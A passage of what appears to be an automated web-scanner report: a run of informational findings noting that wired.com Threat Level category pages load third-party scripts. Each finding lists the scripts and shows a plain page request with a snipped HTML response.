6.95. http://www.wired.com/threatlevel/category/crime/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/crime/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/crime/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:32:55 GMT
Date: Wed, 12 Jan 2011 15:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.96. http://www.wired.com/threatlevel/category/crypto/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/crypto/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/crypto/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=266
Expires: Wed, 12 Jan 2011 15:33:41 GMT
Date: Wed, 12 Jan 2011 15:29:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.97. http://www.wired.com/threatlevel/category/cybarmageddon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cybarmageddon/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/cybarmageddon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:59:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=303
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:29:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.98. http://www.wired.com/threatlevel/category/cyber-warfare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cyber-warfare/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/cyber-warfare/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:11:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=272
Expires: Wed, 12 Jan 2011 15:34:02 GMT
Date: Wed, 12 Jan 2011 15:29:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.99. http://www.wired.com/threatlevel/category/cyberbullying/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cyberbullying/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/cyberbullying/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=223
Expires: Wed, 12 Jan 2011 15:33:22 GMT
Date: Wed, 12 Jan 2011 15:29:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.100. http://www.wired.com/threatlevel/category/cybersecurity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/cybersecurity/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/cybersecurity/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=170
Expires: Wed, 12 Jan 2011 15:32:31 GMT
Date: Wed, 12 Jan 2011 15:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.101. http://www.wired.com/threatlevel/category/defcon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/defcon/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/defcon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.102. http://www.wired.com/threatlevel/category/digital-millennium-copyright-act/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/digital-millennium-copyright-act/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/digital-millennium-copyright-act/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=283
Expires: Wed, 12 Jan 2011 15:34:30 GMT
Date: Wed, 12 Jan 2011 15:29:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 114704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.103. http://www.wired.com/threatlevel/category/e-voting/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/e-voting/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/e-voting/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=215
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:29:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.104. http://www.wired.com/threatlevel/category/elections/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/elections/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/elections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:12:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=263
Expires: Wed, 12 Jan 2011 15:34:13 GMT
Date: Wed, 12 Jan 2011 15:29:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.105. http://www.wired.com/threatlevel/category/fed-blotter/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/fed-blotter/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/fed-blotter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=189
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:29:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.106. http://www.wired.com/threatlevel/category/glitches-and-bugs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/glitches-and-bugs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/glitches-and-bugs/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=158
Expires: Wed, 12 Jan 2011 15:32:37 GMT
Date: Wed, 12 Jan 2011 15:29:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.107. http://www.wired.com/threatlevel/category/hacks-and-cracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/hacks-and-cracks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/hacks-and-cracks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

6.108. http://www.wired.com/threatlevel/category/hans-reiser-trial/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/hans-reiser-trial/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/hans-reiser-trial/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:13:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=250
Expires: Wed, 12 Jan 2011 15:34:18 GMT
Date: Wed, 12 Jan 2011 15:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147168

